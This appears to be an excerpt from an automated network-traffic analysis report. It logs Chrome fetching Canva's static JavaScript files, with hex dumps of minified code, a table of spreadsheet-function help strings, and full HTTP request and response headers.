                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 64 6b 2c 66 6b 2c 67 6b 2c 68 6b 2c 6f 6b 2c 4f 64 61 2c 71 6b 2c 50 64 61 2c 51 64 61 2c 77 6b 2c 79 6b 2c 55 64 61 2c 56 64 61 2c 41 6b 2c 52 64 61 2c 44 6b 2c 45 6b 2c 47 6b 2c 53 64 61 2c 0a 48 6b 2c 6d 6c 2c 4c 6b 2c 4f 6b 2c 73 6c 2c 75 6c 2c 57 64 61 2c 59 64 61 2c 5a 64 61 2c 61 65 61 2c 62 65 61 2c 41 6c 2c 42 6c 2c 43 6c 2c 56 6c 2c 58 64 61 2c 65 65 61 2c 5a 6c 2c 24 6c 2c 61 6d 2c 63 65 61 2c 49 6b 2c 24 64 61 2c 4c 6c 2c 4d 6c 2c 4e 6c 2c 56 6e 2c 68 65 61 2c 6b 6d 2c 6c 6d 2c 5a 6b 2c 54 64 61 2c 4b 6b 2c 6b 65 61 2c 53 6e 2c 73 6d 2c 6c 65 61 2c 6d 65 61 2c 6e 65 61 2c 6f 65 61 2c 70 65 61 2c 71 65 61 2c 72 65 61 2c 70 6f 2c 7a 6f 2c 74 65 61 2c 73 65 61 2c 69 6d 2c 6a 6d 2c 69 65 61 2c 6a 65 61 2c 77 65 61 2c 67 65 61 2c 6e 6d 2c 75 70 2c
                                                                                                                                                                                                                                                    Data Ascii: dk,fk,gk,hk,ok,Oda,qk,Pda,Qda,wk,yk,Uda,Vda,Ak,Rda,Dk,Ek,Gk,Sda,Hk,ml,Lk,Ok,sl,ul,Wda,Yda,Zda,aea,bea,Al,Bl,Cl,Vl,Xda,eea,Zl,$l,am,cea,Ik,$da,Ll,Ml,Nl,Vn,hea,km,lm,Zk,Tda,Kk,kea,Sn,sm,lea,mea,nea,oea,pea,qea,rea,po,zo,tea,sea,im,jm,iea,jea,wea,gea,nm,up,
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 41 68 61 2c 42 68 61 2c 43 68 61 2c 68 77 2c 67 77 2c 66 77 2c 44 68 61 2c 4a 68 61 2c 4b 68 61 2c 69 77 2c 4c 68 61 2c 4d 68 61 2c 4e 68 61 2c 6c 77 2c 52 68 61 2c 54 68 61 2c 6f 77 2c 56 68 61 2c 70 77 2c 71 77 2c 72 77 2c 50 68 61 2c 73 77 2c 74 77 2c 75 77 2c 76 77 2c 57 68 61 2c 58 68 61 2c 59 68 61 2c 41 77 2c 24 68 61 2c 43 77 2c 61 69 61 2c 44 77 2c 46 77 2c 64 69 61 2c 47 77 2c 48 77 2c 4b 77 2c 4c 77 2c 4d 77 2c 4e 77 2c 50 77 2c 4f 77 2c 53 77 2c 67 69 61 2c 55 77 2c 56 77 2c 57 77 2c 54 77 2c 58 77 2c 59 77 2c 5a 77 2c 61 78 2c 62 78 2c 68 69 61 2c 63 78 2c 69 69 61 2c 64 78 2c 6a 69 61 2c 6b 69 61 2c 0a 65 78 2c 66 78 2c 6d 69 61 2c 6e 69 61 2c 68 78 2c 69 78 2c 79 69 61 2c 7a 69 61 2c 6a 78 2c 6e 78 2c 6f 78 2c 41 69 61 2c 6c 78 2c 70 78 2c
                                                                                                                                                                                                                                                    Data Ascii: Aha,Bha,Cha,hw,gw,fw,Dha,Jha,Kha,iw,Lha,Mha,Nha,lw,Rha,Tha,ow,Vha,pw,qw,rw,Pha,sw,tw,uw,vw,Wha,Xha,Yha,Aw,$ha,Cw,aia,Dw,Fw,dia,Gw,Hw,Kw,Lw,Mw,Nw,Pw,Ow,Sw,gia,Uw,Vw,Ww,Tw,Xw,Yw,Zw,ax,bx,hia,cx,iia,dx,jia,kia,ex,fx,mia,nia,hx,ix,yia,zia,jx,nx,ox,Aia,lx,px,
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 61 2c 6e 6e 61 2c 6f 6e 61 2c 6d 44 2c 6f 44 2c 6e 44 2c 72 44 2c 74 44 2c 75 44 2c 71 44 2c 70 44 2c 73 44 2c 76 44 2c 71 6e 61 2c 74 6e 61 2c 75 6e 61 2c 76 6e 61 2c 42 44 2c 79 6e 61 2c 41 6e 61 2c 43 6e 61 2c 45 44 2c 46 44 2c 44 6e 61 2c 45 6e 61 2c 4b 44 2c 47 6e 61 2c 48 6e 61 2c 4a 6e 61 2c 4b 6e 61 2c 4e 6e 61 2c 4f 6e 61 2c 4e 44 2c 50 6e 61 2c 53 44 2c 56 44 2c 52 6e 61 2c 53 6e 61 2c 55 6e 61 2c 54 6e 61 2c 58 44 2c 56 6e 61 2c 58 6e 61 2c 57 6e 61 2c 24 44 2c 5a 6e 61 2c 24 6e 61 2c 61 6f 61 2c 62 6f 61 2c 63 6f 61 2c 64 6f 61 2c 65 6f 61 2c 66 6f 61 2c 67 6f 61 2c 6b 6f 61 2c 6c 6f 61 2c 67 45 2c 73 6f 61 2c 6d 6f 61 2c 6e 6f 61 2c 71 6f 61 2c 74 6f 61 2c 6c 45 2c 77 6f 61 2c 44 6f 61 2c 78 6f 61 2c 79 6f 61 2c 7a 6f 61 2c 41 6f 61 2c 42 6f
                                                                                                                                                                                                                                                    Data Ascii: a,nna,ona,mD,oD,nD,rD,tD,uD,qD,pD,sD,vD,qna,tna,una,vna,BD,yna,Ana,Cna,ED,FD,Dna,Ena,KD,Gna,Hna,Jna,Kna,Nna,Ona,ND,Pna,SD,VD,Rna,Sna,Una,Tna,XD,Vna,Xna,Wna,$D,Zna,$na,aoa,boa,coa,doa,eoa,foa,goa,koa,loa,gE,soa,moa,noa,qoa,toa,lE,woa,Doa,xoa,yoa,zoa,Aoa,Bo
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 4a 2c 69 4a 2c 6d 4a 2c 6e 4a 2c 50 73 61 2c 51 73 61 2c 53 73 61 2c 55 73 61 2c 54 73 61 2c 5a 73 61 2c 73 4a 2c 77 4a 2c 79 4a 2c 24 73 61 2c 42 4a 2c 49 4a 2c 66 74 61 2c 67 74 61 2c 45 4a 2c 46 4a 2c 47 4a 2c 48 4a 2c 68 74 61 2c 69 74 61 2c 4b 4a 2c 64 74 61 2c 65 74 61 2c 4e 4a 2c 6a 74 61 2c 6b 74 61 2c 43 4a 2c 50 4a 2c 51 4a 2c 52 4a 2c 6c 74 61 2c 53 4a 2c 54 4a 2c 55 4a 2c 6e 74 61 2c 6f 74 61 2c 56 4a 2c 6d 74 61 2c 71 74 61 2c 58 4a 2c 75 74 61 2c 61 4b 2c 24 4a 2c 77 74 61 2c 62 4b 2c 78 74 61 2c 63 4b 2c 79 74 61 2c 65 4b 2c 42 74 61 2c 7a 74 61 2c 41 74 61 2c 43 74 61 2c 44 74 61 2c 64 4b 2c 46 74 61 2c 45 74 61 2c 67 4b 2c 68 4b 2c 69 4b 2c 6a 4b 2c 48 74 61 2c 6c 4b 2c 6d 4b 2c 49 74 61 2c 6e 4b 2c 4a 74 61 2c 4b 74 61 2c 4c 74 61 2c 4d
                                                                                                                                                                                                                                                    Data Ascii: J,iJ,mJ,nJ,Psa,Qsa,Ssa,Usa,Tsa,Zsa,sJ,wJ,yJ,$sa,BJ,IJ,fta,gta,EJ,FJ,GJ,HJ,hta,ita,KJ,dta,eta,NJ,jta,kta,CJ,PJ,QJ,RJ,lta,SJ,TJ,UJ,nta,ota,VJ,mta,qta,XJ,uta,aK,$J,wta,bK,xta,cK,yta,eK,Bta,zta,Ata,Cta,Dta,dK,Fta,Eta,gK,hK,iK,jK,Hta,lK,mK,Ita,nK,Jta,Kta,Lta,M
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 67 6c 6f 62 61 6c 20 6f 62 6a 65 63 74 22 29 3b 7d 3b 0a 65 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 62 29 61 3a 7b 76 61 72 20 63 3d 63 61 3b 61 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 2d 31 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 61 5b 64 5d 3b 69 66 28 21 28 65 20 69 6e 20 63 29 29 62 72 65 61 6b 20 61 3b 63 3d 63 5b 65 5d 7d 61 3d 61 5b 61 2e 6c 65 6e 67 74 68 2d 31 5d 3b 64 3d 63 5b 61 5d 3b 62 3d 62 28 64 29 3b 62 21 3d 64 26 26 6e 75 6c 6c 21 3d 62 26 26 62 61 61 28 63 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a
                                                                                                                                                                                                                                                    Data Ascii: (c&&c.Math==Math)return c}throw Error("Cannot find global object");};ea=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&baa(c,a,{configurable:
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 62 6a 65 63 74 22 21 3d 3d 74 79 70 65 6f 66 20 61 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 60 65 78 70 65 63 74 65 64 20 61 6e 20 6f 62 6a 65 63 74 2c 20 66 6f 75 6e 64 3a 20 24 7b 61 7d 60 29 3b 72 65 74 75 72 6e 20 61 7d 3b 74 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 63 6f 6e 73 74 20 64 3d 63 26 26 63 2e 61 64 61 3b 63 3d 63 26 26 63 2e 6e 4a 61 3b 69 66 28 21 28 61 20 69 6e 20 72 61 29 29 7b 63 6f 6e 73 74 20 65 3d 73 65 6c 66 2e 62 6f 6f 74 73 74 72 61 70 3b 69 66 28 21 65 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 62 6f 6f 74 73 74 72 61 70 22 29 3b 72 61 5b 61 5d 3d 7b 2e 2e 2e 65 5b 61 5d 7d 3b 63 7c 7c 64 65 6c 65 74 65 20 65 5b 61 5d 7d 72 65 74 75 72 6e 20 66 61 61
                                                                                                                                                                                                                                                    Data Ascii: bject"!==typeof a)throw new TypeError(`expected an object, found: ${a}`);return a};ta=function(a,b,c){const d=c&&c.ada;c=c&&c.nJa;if(!(a in ra)){const e=self.bootstrap;if(!e)throw Error("Could not find bootstrap");ra[a]={...e[a]};c||delete e[a]}return faa
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 65 78 70 65 63 74 65 64 3a 20 7b 7d 22 2c 61 29 2c 4e 75 6d 62 65 72 28 61 29 3b 63 61 73 65 20 22 6f 62 6a 65 63 74 22 3a 72 65 74 75 72 6e 20 76 28 42 61 2e 68 61 73 28 61 29 2c 22 6f 62 6a 65 63 74 20 76 61 6c 75 65 20 65 78 70 65 63 74 65 64 3a 20 7b 7d 22 2c 61 29 2c 42 61 2e 67 65 74 28 61 29 3b 63 61 73 65 20 22 73 74 72 69 6e 67 22 3a 72 65 74 75 72 6e 20 62 3d 79 61 2e 65 78 65 63 28 61 29 2c 6e 75 6c 6c 21 3d 62 3f 0a 62 5b 31 5d 3a 61 3b 63 61 73 65 20 22 66 75 6e 63 74 69 6f 6e 22 3a 63 61 73 65 20 22 62 69 67 69 6e 74 22 3a 63 61 73 65 20 22 73 79 6d 62 6f 6c 22 3a 74 68 72 6f 77 20 45 72 72 6f 72 28 60 75 6e 65 78 70 65 63 74 65 64 20 68 69 6e 74 20 74 79 70 65 3a 20 24 7b 62 7d 60 29 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20
                                                                                                                                                                                                                                                    Data Ascii: expected: {}",a),Number(a);case "object":return v(Ba.has(a),"object value expected: {}",a),Ba.get(a);case "string":return b=ya.exec(a),null!=b?b[1]:a;case "function":case "bigint":case "symbol":throw Error(`unexpected hint type: ${b}`);default:throw new


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    10192.168.2.449752104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC623OUTGET /web/579a47f0411a508b.strings.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:23 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 7061
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a79f4fe924346-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 50751
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "7d0dbd3e6b5398f851084b652d4490b1"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:09 GMT
                                                                                                                                                                                                                                                    Last-Modified: Wed, 18 Dec 2024 00:28:23 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 19 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: x8toz1x7/Mq01K0v48HWYscKZFNJpocL4y9qf3lwzN5FR2JebR9IdVecNizvS3+u9MA2zTAtyNY=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: P54J988M9BARBSPE
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: UU.DrURZ5Nse2Od9j.1X8HFwkYgIHOkk
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC348INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 6f 7a 34 68 43 47 51 6f 6b 48 4b 48 46 25 32 46 43 36 54 61 71 70 68 45 64 62 4a 56 39 35 56 57 5a 73 56 35 75 6d 53 31 50 51 74 34 57 47 36 38 47 6e 25 32 42 77 34 30 39 70 4b 6a 6c 32 57 58 6b 72 70 39 64 43 53 56 45 6b 6e 68 5a 59 6b 71 37 45 6b 4c 69 57 69 48 66 78 62 49 50 71 74 63 49 55 68 30 53 32 5a 4f 66 71 46 38 68 62 33 47 52 46 48 39 65 4d 64 76 4f 58 47 54 4f 7a 4f 6a 78 68 70 4c 65 51 77 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oz4hCGQokHKHF%2FC6TaqphEdbJV95VWZsV5umS1PQt4WG68Gn%2Bw409pKjl2WXkrp9dCSVEknhZYkq7EkLiWiHfxbIPqtcIUh0S2ZOfqF8hb3GRFH9eMdvOXGTOzOjxhpLeQw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 63 6f 6e 73 74 20 6d 65 73 73 61 67 65 73 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 22 7b 5c 22 69 6e 37 67 7a 77 5c 22 3a 5c 22 e2 80 8e 7b 30 7d 20 e2 86 92 20 7b 31 7d 5c 22 2c 5c 22 54 4e 65 6b 4e 41 5c 22 3a 5c 22 45 6e 67 69 6e 65 65 72 69 6e 67 5c 22 2c 5c 22 79 54 43 71 45 51 5c 22 3a 5c 22 41 62 73 6f 6c 75 74 65 20 76 61 6c 75 65 2e 20 52 65 6d 6f 76 65 73 20 6d 69 6e 75 73 20 73 69 67 6e 73 20 66 72 6f 6d 20 6e 65 67 61 74 69 76 65 20 6e 75 6d 62 65 72 73 2e 5c 22 2c 5c 22 59 41 59 75 30 51 5c 22 3a 5c 22 52 65 74 75 72 6e 73 20 54 52 55 45 20 69 66 20 61 6e 79 20 61 72 67 75 6d 65 6e 74 20 69 73 20 54 52 55 45 2e 5c 22 2c 5c 22 4c 45 34 4d 65 51 5c 22 3a 5c 22 45 73 63 5c 22 2c 5c 22 52 2b 78 32 53
                                                                                                                                                                                                                                                    Data Ascii: (function() { const messages = JSON.parse("{\"in7gzw\":\"{0} {1}\",\"TNekNA\":\"Engineering\",\"yTCqEQ\":\"Absolute value. Removes minus signs from negative numbers.\",\"YAYu0Q\":\"Returns TRUE if any argument is TRUE.\",\"LE4MeQ\":\"Esc\",\"R+x2S
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 3a 5c 22 52 65 74 75 72 6e 73 20 54 52 55 45 20 69 66 20 61 6c 6c 20 61 72 67 75 6d 65 6e 74 73 20 61 72 65 20 54 52 55 45 2e 5c 22 2c 5c 22 4b 4f 62 4e 7a 67 5c 22 3a 5c 22 54 6f 67 67 6c 65 20 66 75 6c 6c 73 63 72 65 65 6e 5c 22 2c 5c 22 31 67 79 4b 73 67 5c 22 3a 5c 22 52 65 74 75 72 6e 73 20 74 68 65 20 66 69 72 73 74 20 63 68 61 72 61 63 74 65 72 73 2e 5c 22 2c 5c 22 56 53 4a 77 55 77 5c 22 3a 5c 22 28 6f 70 65 6e 73 20 69 6e 20 61 20 6e 65 77 20 74 61 62 20 6f 72 20 77 69 6e 64 6f 77 29 5c 22 2c 5c 22 67 75 59 37 61 67 5c 22 3a 5c 22 57 65 e2 80 99 72 65 20 68 61 76 69 6e 67 20 73 6f 6d 65 20 70 72 6f 62 6c 65 6d 73 5c 22 2c 5c 22 36 49 4b 70 6c 67 5c 22 3a 5c 22 72 65 74 75 72 6e 2d 72 6f 77 5c 22 2c 5c 22 6f 63 67 79 56 77 5c 22 3a 5c 22 41 6c 74
                                                                                                                                                                                                                                                    Data Ascii: :\"Returns TRUE if all arguments are TRUE.\",\"KObNzg\":\"Toggle fullscreen\",\"1gyKsg\":\"Returns the first characters.\",\"VSJwUw\":\"(opens in a new tab or window)\",\"guY7ag\":\"Were having some problems\",\"6IKplg\":\"return-row\",\"ocgyVw\":\"Alt
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 63 6f 6e 64 69 74 69 6f 6e 2e 5c 22 2c 5c 22 5a 46 64 79 54 51 5c 22 3a 5c 22 46 69 6e 61 6e 63 69 61 6c 5c 22 2c 5c 22 74 6f 45 4d 53 51 5c 22 3a 5c 22 41 64 64 73 20 74 68 65 20 76 61 6c 75 65 73 20 69 6e 20 61 20 72 61 6e 67 65 20 74 68 61 74 20 6d 65 65 74 20 61 20 73 70 65 63 69 66 69 65 64 20 63 6f 6e 64 69 74 69 6f 6e 2e 5c 22 2c 5c 22 71 73 7a 49 6b 41 5c 22 3a 5c 22 43 61 70 74 69 6f 6e 73 5c 22 2c 5c 22 4f 35 69 34 41 51 5c 22 3a 5c 22 43 61 6e 6e 6f 74 20 72 65 73 6f 6c 76 65 20 72 61 6e 67 65 5c 22 2c 5c 22 36 43 35 68 6c 67 5c 22 3a 5c 22 54 69 6d 65 6c 69 6e 65 5c 22 2c 5c 22 6b 34 46 49 74 67 5c 22 3a 5c 22 42 61 6e 6e 65 72 5c 22 2c 5c 22 65 6e 6a 73 49 51 5c 22 3a 5c 22 52 65 74 75 72 6e 73 20 74 68 65 20 6e 75 6d 62 65 72 20 6f 66 20 63
                                                                                                                                                                                                                                                    Data Ascii: condition.\",\"ZFdyTQ\":\"Financial\",\"toEMSQ\":\"Adds the values in a range that meet a specified condition.\",\"qszIkA\":\"Captions\",\"O5i4AQ\":\"Cannot resolve range\",\"6C5hlg\":\"Timeline\",\"k4FItg\":\"Banner\",\"enjsIQ\":\"Returns the number of c
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 67 65 73 2e 5c 22 2c 5c 22 65 7a 64 63 66 77 5c 22 3a 5c 22 43 6c 6f 73 65 5c 22 2c 5c 22 67 30 55 56 58 67 5c 22 3a 5c 22 4c 6f 67 69 63 61 6c 20 26 20 43 6f 6e 64 69 74 69 6f 6e 61 6c 5c 22 2c 5c 22 61 74 35 6d 74 67 5c 22 3a 5c 22 43 68 65 63 6b 20 69 66 20 74 68 65 20 76 61 6c 75 65 20 69 73 20 65 6d 70 74 79 2e 5c 22 2c 5c 22 47 31 45 74 36 67 5c 22 3a 5c 22 43 75 62 65 5c 22 2c 5c 22 70 68 37 36 54 51 5c 22 3a 5c 22 49 6d 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 5c 22 2c 5c 22 46 51 35 4d 43 51 5c 22 3a 5c 22 45 6e 74 65 72 20 66 75 6c 6c 20 73 63 72 65 65 6e 5c 22 2c 5c 22 2b 6f 41 63 7a 77 5c 22 3a 5c 22 76 61 6c 75 65 5c 22 2c 5c 22 59 4e 5a 48 64 51 5c 22 3a 5c 22 64 61 79 5c 22 2c 5c 22 48 4d 65 75 54 67 5c 22 3a 5c 22 46 69 6e 64 73 20 74 68 65
                                                                                                                                                                                                                                                    Data Ascii: ges.\",\"ezdcfw\":\"Close\",\"g0UVXg\":\"Logical & Conditional\",\"at5mtg\":\"Check if the value is empty.\",\"G1Et6g\":\"Cube\",\"ph76TQ\":\"Image not found\",\"FQ5MCQ\":\"Enter full screen\",\"+oAczw\":\"value\",\"YNZHdQ\":\"day\",\"HMeuTg\":\"Finds the
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 61 74 20 6d 65 65 74 20 6d 75 6c 74 69 70 6c 65 20 73 70 65 63 69 66 69 65 64 20 63 6f 6e 64 69 74 69 6f 6e 73 2e 5c 22 2c 5c 22 6a 31 66 62 71 67 5c 22 3a 5c 22 54 68 65 20 66 6f 72 6d 75 6c 61 20 63 6f 6e 74 61 69 6e 73 20 61 6e 20 75 6e 6b 6e 6f 77 6e 20 66 75 6e 63 74 69 6f 6e 20 6e 61 6d 65 5c 22 2c 5c 22 30 4b 58 35 30 77 5c 22 3a 5c 22 53 68 69 66 74 5c 22 2c 5c 22 71 45 55 5a 76 67 5c 22 3a 5c 22 41 72 72 61 79 5c 22 2c 5c 22 71 36 2f 63 73 77 5c 22 3a 5c 22 49 6e 66 6f 72 6d 61 74 69 6f 6e 5c 22 2c 5c 22 76 2f 68 6e 51 51 5c 22 3a 5c 22 50 61 67 65 20 7b 30 7d 5c 22 2c 5c 22 6f 2b 6a 45 73 67 5c 22 3a 5c 22 43 61 6c 63 75 6c 61 74 65 73 20 74 68 65 20 63 6f 72 72 65 6c 61 74 69 6f 6e 20 63 6f 65 66 66 69 63 69 65 6e 74 20 6f 66 20 74 77 6f 20 72
                                                                                                                                                                                                                                                    Data Ascii: at meet multiple specified conditions.\",\"j1fbqg\":\"The formula contains an unknown function name\",\"0KX50w\":\"Shift\",\"qEUZvg\":\"Array\",\"q6/csw\":\"Information\",\"v/hnQQ\":\"Page {0}\",\"o+jEsg\":\"Calculates the correlation coefficient of two r
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC216INData Raw: 64 65 64 20 3d 20 63 6d 73 67 5b 22 6c 6f 61 64 65 64 22 5d 20 3d 20 63 6d 73 67 5b 22 6c 6f 61 64 65 64 22 5d 20 7c 7c 20 7b 7d 3b 0a 20 6c 6f 61 64 65 64 5b 22 31 33 38 39 5f 65 6e 22 5d 20 3d 20 31 3b 0a 20 63 6f 6e 73 74 20 73 74 72 69 6e 67 73 20 3d 20 63 6d 73 67 5b 22 73 74 72 69 6e 67 73 22 5d 20 3d 20 63 6d 73 67 5b 22 73 74 72 69 6e 67 73 22 5d 20 7c 7c 20 7b 7d 3b 0a 20 73 74 72 69 6e 67 73 5b 22 65 6e 22 5d 20 3d 20 73 74 72 69 6e 67 73 5b 22 65 6e 22 5d 20 3f 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 73 74 72 69 6e 67 73 5b 22 65 6e 22 5d 2c 20 6d 65 73 73 61 67 65 73 29 20 3a 20 6d 65 73 73 61 67 65 73 3b 0a 7d 29 28 29 3b
                                                                                                                                                                                                                                                    Data Ascii: ded = cmsg["loaded"] = cmsg["loaded"] || {}; loaded["1389_en"] = 1; const strings = cmsg["strings"] = cmsg["strings"] || {}; strings["en"] = strings["en"] ? Object.assign(strings["en"], messages) : messages;})();


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    11192.168.2.449753104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC623OUTGET /web/4b29606fa142efca.runtime.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:23 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 18726
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a79f53f31c332-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 4334
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "317db91658fde2a75ef62de7a2be822c"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:09 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:33 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
